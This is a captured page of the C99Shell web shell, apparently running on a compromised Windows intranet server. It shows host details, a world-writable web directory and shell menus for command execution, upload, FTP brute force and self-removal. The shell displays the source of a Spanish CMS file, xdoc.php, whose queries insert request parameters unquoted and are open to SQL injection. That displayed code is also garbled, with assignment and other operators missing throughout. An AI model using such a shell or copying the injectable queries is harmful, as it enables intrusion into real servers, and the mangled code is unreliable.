!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\php\OAB\   drwxrwxrwx
Free 4.1 GB of 39.52 GB (10.37%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     xdoc.php (6.41 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php require_once('Connections/oa.php'); ?>
<? function filesize_format ($pesoarchivo) {
  $pesoarchivo=(float)$pesoarchivo;
  if ($pesoarchivo<1024){
  $numero=number_format($pesoarchivo, 0, ',', '.')." B";
  return $numero;
  }
  if ($pesoarchivo<1048576){
     $numero=number_format($pesoarchivo/1024, 2, ',', '.')." KB";
  return $numero;
  }
  if ($pesoarchivo>=1048576){
     $numero=number_format($pesoarchivo/1048576, 2, ',', '.')." MB";
  return $numero;
  }
}
?>
<?php
if (!function_exists("GetSQLValueString")) {
function 
GetSQLValueString($theValue$theType$theDefinedValue ""$theNotDefinedValue ""
{
  
$theValue get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue;

  
$theValue function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue);

  switch (
$theType) {
    case 
"text":
      
$theValue = ($theValue != "") ? "'" $theValue "'" "NULL";
      break;    
    case 
"long":
    case 
"int":
      
$theValue = ($theValue != "") ? intval($theValue) : "NULL";
      break;
    case 
"double":
      
$theValue = ($theValue != "") ? "'" doubleval($theValue) . "'" "NULL";
      break;
    case 
"date":
      
$theValue = ($theValue != "") ? "'" $theValue "'" "NULL";
      break;
    case 
"defined":
      
$theValue = ($theValue != "") ? $theDefinedValue $theNotDefinedValue;
      break;
  }
  return 
$theValue;
}
}

$cm_rsCONT "0";
if (isset(
$cm)) {
  
$cm_rsCONT = (get_magic_quotes_gpc()) ? $cm addslashes($cm);
}
mysql_select_db($database_oa$oa);
$query_rsCONT sprintf("SELECT idcontenido, titulo, textoinicial, imagen FROM contenidos WHERE idcat = %s ORDER BY orden"GetSQLValueString($cm_rsCONT"int"));
$rsCONT mysql_query($query_rsCONT$oa) or die(mysql_error());
$row_rsCONT mysql_fetch_assoc($rsCONT);
$totalRows_rsCONT mysql_num_rows($rsCONT);

$contenido_rsDetalle "0";
if (isset(
$contenido)) {
  
$contenido_rsDetalle = (get_magic_quotes_gpc()) ? $contenido addslashes($contenido);
}
mysql_select_db($database_oa$oa);
$query_rsDetalle sprintf("SELECT idcontenido, titulo, textoinicial, textocompleto FROM contenidos WHERE idcontenido = %s"$contenido_rsDetalle);
$rsDetalle mysql_query($query_rsDetalle$oa) or die(mysql_error());
$row_rsDetalle mysql_fetch_assoc($rsDetalle);
$totalRows_rsDetalle mysql_num_rows($rsDetalle);

$cont_rsanexos "0";
if (isset(
$contenido)) {
  
$cont_rsanexos = (get_magic_quotes_gpc()) ? $contenido addslashes($contenido);
}
mysql_select_db($database_oa$oa);
$query_rsanexos sprintf("SELECT id_anexo, anexos.titulo, anexos.enlace, tipoarchivo.imagen as imagen FROM contenidos, anexos, tipoarchivo WHERE anexos.contenido = contenidos.idcontenido and anexos.tipo = tipoarchivo.idtipo and contenidos.idcontenido=%s ORDER BY titulo"$cont_rsanexos);
$rsanexos mysql_query($query_rsanexos$oa) or die(mysql_error());
$row_rsanexos mysql_fetch_assoc($rsanexos);
$totalRows_rsanexos mysql_num_rows($rsanexos);

$cat_rsIntros "0";
if (isset(
$cm)) {
  
$cat_rsIntros = (get_magic_quotes_gpc()) ? $cm addslashes($cm);
}
mysql_select_db($database_oa$oa);
$query_rsIntros sprintf("SELECT titulo, contenido FROM intros WHERE idtema = %s"GetSQLValueString($cat_rsIntros"int"));
$rsIntros mysql_query($query_rsIntros$oa) or die(mysql_error());
$row_rsIntros mysql_fetch_assoc($rsIntros);
$totalRows_rsIntros mysql_num_rows($rsIntros);
?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">
LI.list1 {list-style: circle outside;} 
</style>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
<link href="css/enlaces.css" rel="stylesheet" type="text/css" />
</head>

<body>
<?php if ($totalRows_rsDetalle == 0) { // Show if recordset empty ?>
    <?php if ($totalRows_rsIntros 0) { // Show if recordset not empty ?>
    <span class="textoTitulo"><?php echo $row_rsIntros['titulo']; ?></span><br />
    <br />
    <span class="textoNormal"><?php echo $row_rsIntros['contenido']; ?></span>
    <?php // Show if recordset not empty ?>
    <?php // Show if recordset empty ?>
<?php 
do { ?>
<?php 
if ($totalRows_rsCONT && $totalRows_rsDetalle == 0) { // Show if recordset not empty ?>

  
<table width="450" border="0" cellpadding="3" cellspacing="3">
  <tr>
          
    <td width="80" align="center" valign="top"><img src="images/imgnoticias/<?php echo $row_rsCONT['imagen']; ?>" /></td>
      <td><li class="list1"><span class="textoTitulo"><?php echo $row_rsCONT['titulo']; ?></span> 
        <p class="textoNormal"><?php echo $row_rsCONT['textoinicial']; ?> <a href="index.php?<? echo $ruta;?>&contenido=<?php echo $row_rsCONT['idcontenido']; ?>" class="donkey">Ver 
          texto completo</a> </p>
  </td>
    </tr>
  </table>
  <?php // Show if recordset not empty ?>
  <?php } while ($row_rsCONT mysql_fetch_assoc($rsCONT)); ?> 
<?php if ($totalRows_rsDetalle 0) { // Show if recordset not empty ?>
<span class="textoTitulo"><?php echo $row_rsDetalle['titulo']; ?></span> <br />
<br />
<span class="textoNormal"><?php echo $row_rsDetalle['textoinicial']; ?></span> <span class="textoNormal"><?php echo $row_rsDetalle['textocompleto']; ?><br />
<br />
<?php if ($totalRows_rsanexos 0) { // Show if recordset not empty ?>
<br />
Documentos Anexos<br />
<br />
<?php do { ?>
<a href="<?php echo $row_rsanexos['enlace']; ?>" class="donkey" target="_blank"><?php echo $row_rsanexos['titulo'];?>&nbsp;&nbsp;<?php echo $row_rsanexos['imagen'];?></a>

<?
$inix=substr($row_rsanexos['enlace'],0,5); 
if (($inix=="http:")||($inix=="index")){

echo "<span class='textoNormal'>Tam: ND</span>";

}else{
$valx=filesize (/*$PHP_SELF.*/$_SERVER['DOCUMENT_ROOT']."/".$row_rsanexos['enlace']);
//$pesoarchivo=(number_format($pesoarchivo,0,".",","));
echo "<span class='textoNormal'>Tam: ".filesize_format ($valx)." </span>";

}


?>



<br />
<br />
<?php } while ($row_rsanexos mysql_fetch_assoc($rsanexos)); ?>
<br />
<?php // Show if recordset not empty ?>
<br />
<br />
<br />
</span> 
<?php // Show if recordset not empty ?>
 
</body>
</html>
<?php
mysql_free_result
($rsCONT);

mysql_free_result($rsDetalle);

mysql_free_result($rsanexos);

mysql_free_result($rsIntros);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--